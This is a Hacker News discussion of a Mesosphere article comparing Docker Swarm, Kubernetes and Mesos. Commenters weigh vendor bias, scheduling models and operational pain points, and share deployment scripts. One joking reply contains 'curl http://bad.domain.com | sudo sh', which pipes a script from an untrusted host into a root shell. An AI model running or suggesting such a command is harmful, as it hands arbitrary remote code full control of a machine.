Docker vs. Kubernetes vs. Mesos (mesosphere.com)
303 points by martymatheny on Aug 2, 2017 | 74 comments



These kinds of articles are not very useful: Mesosphere is the company behind DC/OS and Mesos, so they have every interest in the world to say that Mesos is the best. Things like "... are willing to get your hands dirty integrating your solution with the underlying infrastructure" when talking about Kubernetes are unfair, especially if you compare Kubernetes to Mesos and not to Mesosphere DC/OS, for which they provide paid services.

It is true that Mesos works on a different level, but, most of all, the two-level scheduling is just a different take on the problem of abstracting physical/virtual resources. In the end, both Mesos/Marathon and Kubernetes aim at the same goal: letting developers stop thinking about servers.

Kubernetes' great advantages are the community (which is unbelievable) and the extensibility it offers: Third Party Resources (now Custom Resource Definitions), pluggable webhooks in the API server, and a number of other things that are simply not there in Marathon or any competitor, all of which let companies make Kubernetes work best for their use cases.


The Kubernetes folks talk about the differences here and how you could build Mesos apps in K8s: https://github.com/davidopp/kubernetes/blob/87f2590f373306ea...

The limitation of only being able to run containers will, I think, be fleeting. As Docker and its alternatives mature, it really won't make sense to use anything else when trying to get the scale that Kubernetes and Mesos are going for by abstracting out the underlying hardware and providing a framework to run sophisticated apps on undifferentiated hardware.


What's described in that doc is even easier today thanks to Operators (https://coreos.com/operators), which, to quote the description page, are "application-specific controller[s] that extend[s] the Kubernetes API to create, configure and manage instances of complex stateful applications on behalf of a Kubernetes user."

Disclosure: I work on Kubernetes at Google (and wrote the doc you linked to).


Some of us love getting our hands dirty. In my honest opinion, this whole article seemed very neutral in phrasing. It wasn't until I decided to check the source, after having read and enjoyed the entire article, that I discovered it was published on a Mesosphere domain. And even then, I applaud that they were humble enough to save their own product until the end and didn't seem to exaggerate their sales pitch.


True, it is not too much of a sales pitch, but it is still something that can't really be seen as impartial, for natural reasons (it comes from the company behind Mesos), and it loses a bit of clarity towards the end (Java doesn't equal legacy, and you can run stateful workloads on Kubernetes).

From my point of view, the benefits of the two-level scheduling are actually quite limited compared to how the whole story is usually told. Some Mesos frameworks always use all the resources of the cluster, and it can get tricky to really have multiple frameworks running at the same time on Mesos. Also, sometimes those frameworks don't really offer enough additional features to justify changing the way you are already using Spark, Cassandra and so on.


Exactly. The frameworks that the article describes know how to run, say, Cassandra or Spark, but you can do the same thing in Kubernetes using TPRs or CRDs with operators:

[0] https://github.com/coreos/prometheus-operator
[1] https://github.com/coreos/etcd-operator
[2] https://github.com/huawei-cloudfederation/redis-operator
[3] https://github.com/CrunchyData/postgres-operator
[4] https://github.com/krallistic/kafka-operator
[5] https://github.com/pegerto/cassandra-operator
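For example, with the etcd operator [1] installed, asking for a cluster is (roughly, going by its README at the time; the name, size and version here are arbitrary) a single custom resource:

    kubectl apply -f - <<EOF
    apiVersion: etcd.database.coreos.com/v1beta2
    kind: EtcdCluster
    metadata:
      name: example-etcd
    spec:
      size: 3
      version: 3.1.8
    EOF

The operator's controller then watches these EtcdCluster objects and creates/repairs the underlying pods, which is roughly the role those Mesos frameworks play.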


There doesn't appear to be anything at #2 - https://github.com/huawei-cloudfederation/redis-operator.


From what I've seen, Huawei will upload it soon™


One more difference is Mesos is written in C++, while Kubernetes is written in Go.


Is that relevant?


Well, for something as crucial as this, you want to be able to debug and patch the code. I mean: when using it outside of hobby projects, prototyping or a startup (i.e. the rest of the economy, where money wants to buy off risk), this stuff can't be a magic black box. That would be so irresponsible. "Why are our servers down? We are losing 500k per day." .. "We are getting some weird error we can't debug because we don't know the codebase, or worse, the language. But we are searching for random dumb stuff to try on StackOverflow." Yeah, somebody is getting fired.

So for the developers responsible for uptime, it could matter a lot whether they are comfortable with the codebase or the language it is written in.

Of course, if you are more of a consumer-app type of startup, just put all your energy into UX and such and hope for the best. But let's hope every bank that uses this sort of stuff has a developer on call who can actually dive into the codebase.


Also, many parts of the Mesos ecosystem are Java, so a JVM is required to run them. That is relevant from a deployment perspective.


Apart from ZooKeeper, I can't remember any other Java software in the Mesos ecosystem.


He at least did give information about the topic at hand

Edit: I apologize to the readers, this is not the right place for this kind of talk


Of course. Google open sourced a container runtime in C++ before, and no one cared.


It feels downplayed in this article, so I would like to state for the record here that I am a happy user of Docker Swarm.

Swarm has been shown to scale to tens of thousands of hosts, but I found it easy to start with, especially with the Gitlab CI support, which natively brings a Docker container registry.

So I commit, CI builds my containers, stores them in my private registry, and automatically deploys from there to the Swarm in various environments. All this was much easier to set up than the alternatives.
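The deploy step itself boils down to a few commands, roughly like this (a sketch; the registry path and service name are placeholders, and CI_COMMIT_SHA is GitLab CI's predefined commit variable):

    docker build -t registry.example.com/group/app:$CI_COMMIT_SHA .
    docker push registry.example.com/group/app:$CI_COMMIT_SHA
    docker service update --with-registry-auth \
      --image registry.example.com/group/app:$CI_COMMIT_SHA app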

Also, I expect an easy transition should I ever need to move to Mesos or k8s. In the meantime, I like to keep it simple.


I'm also a user of Docker Swarm - and I love it! I have extensively played with k8s and feel it has a lot of upfront complexity (especially ingress).

I feel people who are beginning to scale from one machine to 10 will love Docker Swarm (and stick with it). While those who have about 100 machines will start with Mesos/K8s.


There's no direct migration path from Swarm to Kubernetes, so we chose to start out at a small scale with the latter. It was enough of a leap to fundamentally change how we were building and deploying things. We didn't want to do it twice!

You can dodge much of the operational complexity in standing a cluster up by starting with Google Container Engine or a provisioner like kops. Once you have enough comfort, you can get fancier and build something more customized to your use cases.


Actually, I think it's the other way around.

I'm not sure people who start with Docker Swarm will want to migrate to k8s at all. It works damn well and I have been very happy with it. It has been demonstrated to work at scale.

K8s does have Google behind it though


How do you automate the updating of images on Docker Swarm?


I do this:

    docker build -t $APPNAME:$timestamp .
    OUTPUT="$(docker service inspect -f '{{.Spec.Name}}' sv-$APPNAME || true)"
    if [ "$OUTPUT" == "" ]; then
      # Service does not exist
      echo "Creating service"
      docker service create --update-delay 5s \
        --publish $PUBPORT:8080 --replicas 2 \
        --mount type=bind,source=$(cd ../images; pwd),target=/images,readonly=true \
        --mount type=bind,source=$(cd ../processed_images; pwd),target=/app/images \
        --mount type=bind,source=$(cd ..; pwd)/config.json,target=/config.json,readonly=true \
        --mount type=bind,source=$(cd ~/.aws; pwd),target=/root/.aws,readonly=true \
        --name sv-$APPNAME $APPNAME:$timestamp
    else
      # Service exists
      echo "Updating service"
      docker service update --image $APPNAME:$timestamp sv-$APPNAME
    fi

I haven't looked in a while, but it would be nice if they had some kind of "upstall" (update/install) kinda like upsert (update/insert) in CRUD land.


I can't speak for the original poster, but I also deploy containers from the GitLab registry via GitLab CI pipelines and just use the standard docker swarm commands. So updating the image digest (version) of a service is as simple as running a shell command in a job in a deploy stage of your GitLab CI pipeline:

    docker service update --image <some-image:version> --with-registry-auth <some-service>

Simplest example would be a job definition like this: https://pastebin.com/KsG0cDzR

This job would have to be preceded by building the new Docker image you are going to update to, of course.


This is the easiest part, you just call:

  docker service update --image $image_name:$new_sha $service_name
and Swarm handles the rest. You can even pass in rolling update options, so the container updates are staggered. Put this into a simple bash script that only runs when the current branch is master. (Because your CI is building every branch to give you fast feedback, right?) In the case of CircleCI or TravisCI, that can be done with something like:

  if [ "${CIRCLE_BRANCH}" == "master" ]; then


What I've found to work well is to push images to your registry with a different tag for each release. For instance, you have "web:1.0" running in production and want to update? Create a "web:1.1" image, push it to your registry and in Docker Swarm, point your "web" service to the "web:1.1" image instead of "web:1.0".


I define a docker stack .yml file, and have GitLab CI run docker stack deploys.
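For reference, the deploy job then comes down to a single command (a sketch; the stack name and compose file name are placeholders):

    docker stack deploy --compose-file docker-stack.yml --with-registry-auth mystack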


*Marathon on Mesos. :P


I guess I should expect some bias given the publisher, but despite a good technical write-up of the differences, their conclusions aren't really backed up by the rest of the article and the wording is obviously slanted towards their own product.

> While there are multiple initiatives to expand the scope of the project to more workloads (like analytics and stateful data services), these initiatives are still in very early phases and it remains to be seen how successful they may be.

StatefulSets have been in Kubernetes since 1.5 (two versions ago), and while some aspects of them could still do with a bit of work, calling this "very early stages" is unfair, as is the suggestion that there's still no single approach to it.

> If you want to build a reliable platform that runs multiple mission critical workloads including Docker containers, legacy applications (e.g., Java), and distributed data services (e.g., Spark, Kafka, Cassandra, Elastic), and want all of this portable across cloud providers and/or datacenters, then Mesos (or our own Mesos distribution, Mesosphere DC/OS) is the right fit for you.

It's not clear from the article why Mesos is "a reliable platform" but Kubernetes is implied not to be. I'm also not sure about the frequent references to Java as a special case - you can obviously run Java services on top of Kubernetes as well.


They said legacy applications. You can run a command or script or binary in Mesos / Marathon. In Kubernetes, you can only run containers. So at a minimum, your legacy app has to be containerized / dockerized.
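As a sketch of what that minimal containerization might look like for, say, a legacy Java fat jar (the base image tag and file names here are made up):

    # Write a minimal Dockerfile around an existing jar and build the image
    cat > Dockerfile <<'EOF'
    FROM openjdk:8-jre
    COPY legacy-app.jar /app/legacy-app.jar
    CMD ["java", "-jar", "/app/legacy-app.jar"]
    EOF
    docker build -t legacy-app:1.0 .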


> You can run a command or script or binary in Mesos / marathon.

Where does the binary come from, if not from a container?


  curl http://bad.domain.com | sudo sh
naturally

To be fair, we put our payloads on S3 and tell our universal executor to fetch & unpack them & run a configured command. We successfully wrote an xargs-replacement as a Mesos framework which worked pretty well.


And in Kubernetes land, you can run an Ubuntu container and do that just as well. Except you'll lose out on having all the shared resources and state of your host machine. If that sounds scary to you, you should take a minute to think about it the other way: under the Mesos model, every process can modify the state shared by every other process. If that hasn't convinced you off Mesos, then I wish you all the luck you deserve, but not the luck you'll need.


3/10 patronizing and FUD. Mesos is happy to limit resources with cgroups etc. When you say

  every process can modify the state shared by every other process
in italics (the scariest type variant), do you mean ‘the filesystem’? Mesos has a swathe of isolators to choose from to enforce separation. Mesos is also happy to let tasks run as a specific user, so the good old Unix process model will stop random tasks from stomping each other.

Did you see the other comments drawing attention to the inequality of the Mesos/Kubernetes comparison & suggesting Marathon as the more appropriate peer technology?


In Marathon you would specify it as a URI. See:

https://mesosphere.github.io/marathon/docs/application-basic...

The Mesos executor can run shell commands or Docker containers.
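A rough sketch of such an app definition posted to Marathon's REST API (the Marathon host, artifact URL and command here are placeholders):

    curl -X POST http://marathon.example.com:8080/v2/apps \
      -H 'Content-Type: application/json' -d '{
        "id": "/legacy-worker",
        "cmd": "cd worker-* && ./bin/start --port $PORT0",
        "cpus": 0.5,
        "mem": 256,
        "instances": 2,
        "uris": ["https://example.com/releases/worker-1.0.tgz"]
      }'

Mesos fetches and unpacks the URI into the task sandbox before running the command, so no container image is involved.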


I recently evaluated all 3 solutions. Here is how I see it after testing the waters:

- want something simple that works today? Docker Swarm

- want something amazingly flexible? Kubernetes

- already use Mesos or DC/OS? Marathon/Mesos

This article from Mesosphere is interesting and gives a good overview, but it downplays advantages of Swarm and Kubernetes and clearly highlights Mesos: Docker has 4 bullet points, Kubernetes has 3 and Mesos has 5.

In addition, Marathon is meant to work on Mesosphere DC/OS and not on other operating systems. For instance, the "Virtual IP" [1] feature only works on DC/OS from what I can tell. This confused me because the feature appears in the UI even if you run Ubuntu; it just doesn't work in that setup.

Docker Swarm seems to have a very comparable feature set, but doesn't care what OS you run.

There is a Mesos plugin for Kubernetes [2] but it looks unmaintained, so this sentence seems a bit off: "Mesos could even run Kubernetes or other container orchestrators, though a public integration is not yet available." This also goes to show how important community support and commercial backing are, and Kubernetes is the clear winner here.

At the end, you can read this: "want all of this portable across cloud providers and/or datacenters, then Mesos (or our own Mesos distribution, Mesosphere DC/OS)". With Docker Swarm, you can use multiple cloud providers. Docker Swarm does not care about what servers you use. It encrypts traffic between nodes and needs Docker. That's it. It is cloud agnostic. I'm not sure what the story is with Kubernetes here. Kubernetes is a huge beast: very flexible and powerful, but a high upfront setup cost when you want to manage everything yourself.
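For what it's worth, bootstrapping a Swarm across arbitrary hosts is roughly two commands (a sketch; the addresses are placeholders and the join token is printed by the init command):

    # On the first manager
    docker swarm init --advertise-addr 203.0.113.10
    # On every other node, using the token printed above
    docker swarm join --token <token> 203.0.113.10:2377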

[1] https://dcos.io/docs/1.9/networking/load-balancing-vips/

[2] https://github.com/mesosphere/kubernetes-mesos


Kubernetes runs on GCP, AWS, and Azure, and in various on-prem configurations (including on OpenStack).

Disclosure: I work on Kubernetes at Google.


Hello David, thanks for your input here! I was wondering specifically about a hybrid cloud / multi-az setup. Does Kubernetes support that?


I'm not David but the answer is yes. After spinning up multiple discrete clusters, you can orchestrate across them by deploying the federation control plane.

https://kubernetes.io/docs/concepts/cluster-administration/f...
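The rough flow, going by the federation docs of that era (a sketch; the federation name, cluster contexts and DNS settings are placeholders), is to initialize the federation control plane on one cluster and then join the others:

    kubefed init myfed \
      --host-cluster-context=us-east-cluster \
      --dns-provider=google-clouddns \
      --dns-zone-name=example.com.
    kubefed join eu-west-cluster --host-cluster-context=us-east-cluster

After that, resources created against the federation API server get propagated to the member clusters.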


Uh, I'm skeptical about Swarm being something that "works today". I really want to use it and spent some time experimenting, but failed to get it working. It could work for a toy web-app project, but I believe it is insufficient for anything complicated. There are a lot of things that one would expect to have but that are still unsolved. Or I'm just unaware that there is a solution (or the solution didn't fit my personal requirements).

1. Networking options are really limited.

Built-in ingress loses the originating IP address, cannot bind ports only on specific nodes (something that may have partially fixed this was implemented in 17.06 with the --network=host option, but I haven't found much documentation), cannot prefer same-node containers (which is important if you have many microservices, as the latency adds up quickly), and more.

For ingress, if one is lucky enough to have only HTTP traffic (I don't), they can use something like Traefik. But they'll need to run LBs on manager nodes, which isn't really a smart thing to do, as Swarm is said to be sensitive to overloaded managers. Or one can just go for external LBs, like CloudFlare or whatever Amazon/Google/Microsoft offers.

If one needs raw TCP, UDP or other IP traffic, I think they'd better completely ignore the built-in service discovery and LBs and go for something external, like etcd+haproxy/nginx, outside of the Swarm (on the nodes' host OS). It has to be a completely manual setup (okay, I meant Ansible/Puppet/Chef/Salt/etc). While it's possible to run LBs with Docker (as non-Swarm containers, if the Swarm network is attachable), etcd is just not designed to auto-deploy on Swarm: its design explicitly disallows one to just `docker service create --name etcd my/custom/etcd && docker service scale etcd=5`; you'll need to set up every node by hand. I believe Consul is better in this regard but haven't tried it yet.

2. I haven't figured out how to have persistent storage that follows the containers. If a node dies, Swarm will spawn new containers on other nodes, but there's no chance to have even a slightly dated snapshot of their data. There was something called Flocker that looked like a solution, but it's essentially dead (despite the revival attempts). GlusterFS is an option I know about, but it's really sensitive to latency.

Databases are even trickier, unless one is bold enough to use something fancy like CockroachDB (I had enough subtle issues with RethinkDB to be wary of bleeding-edge stuff). Maybe I'm just too stupid, but I failed to grok a dynamic PostgreSQL multi-master BDR setup, so my DB is still a SPOF with some WAL-streaming replication and manually-activated failovers.

3. Secrets look like a nice addition, but they're best avoided. They're immutable and you have to recreate the container to switch them. If you have any services with many user-initiated long-living connections (e.g. IRC, XMPP, WebSockets or media streaming), this makes secrets basically unusable for anything that needs to be rotated, like TLS certificates (see the rotation sketch at the end of this comment). Unless you can drop all your users every now and then.

4. Logging was quite messy, but they've sorted it out with 17.06.

(As for K8s - it solves most of these issues, but I got my share of issues with Rancher, so I'm really wary about having any complexity in the core. There's already a beast called the Linux kernel down there, and $deity have mercy on those who have to debug its oopses. If a behemoth - I mean, K8s - decides to misbehave, I expect to have a really bad time trying to keep things afloat. Even Swarm mode is a fairly complex black-box binary, but at least I can try debugging it.)
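Re point 3, the usual rotation workaround (which indeed recreates the containers; the secret and service names here are placeholders) is to version secrets and swap them on the service:

    docker secret create site_cert_v2 ./new-cert.pem
    docker service update \
      --secret-rm site_cert_v1 \
      --secret-add source=site_cert_v2,target=site.pem \
      my_service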


Regarding persistent storage following containers, check out REX-Ray: https://rexray.readthedocs.io/en/stable/ as it works with various storage options.


1. You can use host-mode port binding (the equivalent of `docker run -p`, as opposed to the routing mesh); you could also use macvlan/ipvlan to do this (sketch at the end of this comment).

2. Indeed this is tricky right now. One way to sort of fake it is to do something like `--mount type=volume,source='important_data{{.Task.Slot}}'`... I'm not sure I would call this a recommendation, but it's worth playing with. But also, I'm not sure automatic failover of databases is truly a thing; it's just not that easy (outside of the storage aspect).
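For 1, the host-mode publishing looks roughly like this with the 17.06 long-form syntax (the service name, image and ports here are arbitrary):

    docker service create --name web \
      --publish mode=host,target=80,published=80 \
      nginx:alpine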


I do think it's a fight to the death for container orchestrators. The configuration files required to run complex auto-scaling systems can add up (and require a DEEP understanding of all the systems involved and how they interact with each other). Most developers don't want to have to do it for more than one orchestrator, especially since there is no straightforward migration path from one orchestrator to another.

Also, learning different orchestrators is a lot of work. Sure, maybe Mesos does more than just schedule containers, but that doesn't matter because a standardized orchestration platform is the main thing developers need right now - For orchestration to become truly standardized, there needs to be a single big majority winner.

It reminds me of the Minix vs Linux debate in the early days of operating systems; Minix was modular (microkernel) while Linux was monolithic. The reason why Linux won is because it provided a single consistent standard platform on which to build and configure applications. I think the same is going to happen here and I think that Kubernetes or Swarm are better placed in that regard.


I'm not sure I agree. There are many frameworks in the devops space, each with its own DSL and its own learning curve. For example, I see companies split between Puppet, Chef, Salt, Ansible, etc...

It sucks, don't get me wrong, that one hasn't pulled away from the pack, but I don't think it's likely that any of these orchestration frameworks will go away. Each of them has a pretty dedicated following with lots of developers behind it.


>The reason why Linux won is because it provided a single consistent standard platform

I suspect there were many reasons. One reason it might have won vs minix was broader driver support for various video, network, sound cards, etc.


> The configuration files required to run complex auto-scaling systems can add up

Is there a tool for managing orchestration config?

I am very interested in learning the current status.


Just watched a demo about http://codesolvent.com/ on Monday; it seems like they are providing a solution for configuration management that is oriented towards cloud orchestration.

I'm sure there are others, but this was fresh in my mind.


I am a relatively unhappy user of Mesos, Marathon and Chronos, migrating to k8s. While it would take a long time to mention all the reasons (I might do a write-up), one of the main things that pushed us to k8s was the code quality / bugs in the Mesos stack. Minor examples are the bugs breaking HA + SSL in combination (Mesos + Marathon, fixed now) and the odd bugs in Chronos, where a major 3.0 release would forever append CMD to CMD, modifying its own supposedly immutable config into a never-ending string. The list is relatively long, but we were spending too much time catching edge-case bugs, which seem to be a side effect of a fairly loosely coupled stack that doesn't get tested enough.

Overall, so far we are much happier with k8s in terms of both quality and its batteries-included stance on most issues.


As someone rather unfamiliar with the differences in cloud containerization options, I've been extremely confused anytime I see extremely opinionated arguments about cloud infra. This article was a breath of fresh air and is exactly the reference guide that I have been looking for. The author provides a clear history of the development of the titular systems, provides an in-depth overview of their various strengths, and adequately describes the differences in architecture. Overall, an excellent read for the uninitiated.

I have previously tried to investigate why Kubernetes was considered useful [1], or why everyone was losing their minds over Docker [2], but rarely came away with any clear insights.

[1] https://www.kubernetes.io/case-studies/box/ [2] http://www.quotecolo.com/the-case-for-docker-against-cloud-v...


Be aware, though, that this article is clearly partisan.


I would like to share my personal experience running Mesos.

I have been using a pure Mesos setup, without DC/OS, for 2.5 years.

We have the following infra features:

- 120 micro-services running using marathon.

- 10 batch jobs running using Chronos.

- So far, everything is reliable and no downtime.

- We have Ip-Per-Task enabled with Project Calico.

- We have Public, Private, and IP Access-list enabled per container using Nginx and ELBs.

- The max number of containers we ran on the cluster so far is 3620 containers.

- We have detailed graphs monitoring per-container generated automatically.

- We have (slack #alerts) alerting enabled.

- We have secrets store using vault.

In the end we had to use Mesos, Marathon, Chronos, Vault, Consul, Nginx, Calico, ELK and TICK on AWS.

The thing is, we had to configure these things to work together nicely, so it is not an out-of-the-box solution. Even though we haven't used Kubernetes yet, we are not religious about Mesos.

But at the moment, it seems we have everything we need and the team is happy with the current setup.


May I ask for any further details on the use cases, or just about the networking landscape of your setup?


I use that for 2 scenarios:

- to deploy on-demand staging or QA environments, including their dependencies.

- allow service/infra devs to try services quickly without the need to use Terraform or to buy expensive instances in the first stage of the development.


Why should there be an assumption of (full) objectivity in an article written by the provider of one of the 3 technologies being compared? With that said, the article is fairly balanced in presenting some layers of the whole context (mostly the historical one).

Although I would mention Google tried to have their own Docker but that didn't pan out (https://github.com/google/lmctfy) so they switched to Docker and had Kubernetes open-sourced. More historical details would have just made for a longer (albeit more interesting) article I guess.

Now to the actual context. While they mention that Swarm is not in the CNCF and is under the tight control of Docker Inc., they don't mention that while Mesos is in the ASF, Mesosphere hired the majority of the PMC (committers with voting rights), and the rest of DC/OS is not even in the ASF, so it doesn't even have to abide by the rules of the ASF. At the same time, Mesosphere heavily used the Mesos brand by mixing Mesos-phere and DC/OS into everything Mesos.

So the reason people talk about Mesos, Marathon, DC/OS and Mesosphere as almost synonyms is because they made it so. Marathon used to be a Mesos framework and service scheduler, now it's a DC/OS one for the most part (https://news.ycombinator.com/item?id=13656193)

However, in the process, they managed to alienate a part of the community too, all this while Kubernetes was able to do probably one of the best community jobs in OSS and skyrocketed (https://trends.google.com/trends/explore?q=mesos,kubernetes). That must be a bitter irony if you consider that initially Kubernetes was supposed to be just a Mesos framework...

So yes, Mesos is lower level and with the two phase scheduling it should be more versatile, etc. but that value is highly diminished if you consider the focus is around DC/OS.

I think there are several angles that make this whole context interesting. Perhaps it would be worth a full write-up...


> initially Kubernetes was supposed to be just a Mesos framework...

This is not correct. There is a community-owned project that allows Kubernetes to run on Mesos, but it came after standalone Kubernetes.

Disclosure: I work on Kubernetes at Google.


Then perhaps you could ask John Wilkes ;)

later edit: I'm referring to the fact that when Kubernetes came out it didn't have resource allocation and the answer to "how it compares to Mesos" was that it would run on top of Mesos as a framework.

John Wilkes gave a talk about Kubernetes at MesosCon in 2014 https://www.youtube.com/watch?v=VQAAkO5B5Hg and also answered the above question quite a bit while there...


Kubernetes was not designed with the intention that it would be a Mesos framework. But I think it's very cool that people figured out how to make it work as one!

From pre-1.0, Kubernetes did resource allocation for CPU and memory via its cluster-level scheduler, enforced on the node using the standard container isolation mechanisms provided by Docker.

Disclosure: I work on Kubernetes at Google.


This article hilariously makes it seem as though Google hadn't thought about using Linux cgroups and namespaces to manage processes before dotcloud conceived of Docker.

Nothing could be further from the truth. Google has been doing "containers" since before dotcloud was even a company.


This is addressed:

>Google had tremendous experience with containers (they introduced cgroups in Linux) but existing internal container and distributed computing tools like Borg were directly coupled to their infrastructure.


Ah I missed that, touché


One more company with a "pricing" page that has no pricing information on it.


IIRC $5k per node, per year.


Oh. Well. That would explain it. Thanks.


Kubernetes running on DC/OS is mentioned, but not treated as a real alternative. Kubernetes can run as an app on top of Mesos the same way Marathon can. Note: I am a heavy user of Kubernetes, but not Mesos, so I can't comment on how well it works.

Kubernetes uses "two phase scheduling" and Mesos can be plugged as a second phase (e.g. https://github.com/kubernetes-incubator/kube-mesos-framework... seems decent). For me it seems like a perfect combination - on the cloud you utilize cool stuff like GKE or https://azure.microsoft.com/en-us/blog/announcing-azure-cont... for phase 2 of schedule, but if your client wants to run your code to run on their servers you can run it on their mesos/dcos deployment.


Too bad reviewers always forget Nomad from Hashicorp. https://www.nomadproject.io/

The only cluster management system that doesn't take 3 years to understand and doesn't depend on 42 other complicated pieces of software.


Nomad is mentioned in the article, so they hardly forgot about it.


It is true that Mesos is often considered better suited to data/job-oriented workloads as opposed to long-running microservice applications, and I wonder why.

The argument is usually around Mesos' two-level scheduling paradigm, which I'm familiar with, but I still don't see its practical advantages over a simple master scheduler.

Does someone have any insight on this topic? (assume docker containers will be used anyway and that a single application/framework will work on the cluster)


The article is theoretically correct, but in practice, if you use Mesos you will use Marathon/Aurora, and you'll compare that to Kubernetes. I find Kubernetes' "cloud native" approach much more compelling for green-field projects.

BTW, the more I dove into Marathon, the more I discovered how thin a wrapper it is over Mesos, which does most of the work, including the container runtime, pulling resources, starting tasks, handling registries, and now even health checks!


Has anyone run k8s recently on DCOS (1.9)?

We're running on Azure and have spent quite a bit of time and engineering on k8s. We're trying out DCOS for frameworks like Spark. We'd prefer not to run two container infrastructures if possible.

I looked at kubernetes-mesos, but its installation wasn't as simple as "dcos package kubernetes", so I'm wondering if I'm going down a path of high resistance.


I'm using Mesos in production. TL;DR - if you have less than 1000 machines, don't even think about Mesos. They don't care about you (you don't give them enough money, which they are really short of), and their system uses strategies that are effective only when you have a large number of machines.


I'm kind of saddened that BSD jails never got this kind of attention. I wonder why? Is it tooling? There was ezjail and BSDploy. iocage seems to be doing some interesting stuff, especially with respect to configuration.


I kind of wish someone had written this article from an independent viewpoint.



Weird that they say Kubernetes is more comparable to Docker in Swarm mode than to Docker standalone, but then list the features of Docker standalone.

Not that I'd endorse Swarm mode, eh; it's in very, very early stages and lacks a truckload of features before it could be used in anything but the simplest node-replication scenarios.


K8 already won the orchestration battle.


> K8 already won the orchestration battle.

There is a battle? There is only room for a "single" orchestration platform? What about users with needs that differ from the mainstream?

I find that such a limiting worldview on deploying infrastructure. If I wanted "one size fits all" I would stay within the Microsoft environment.



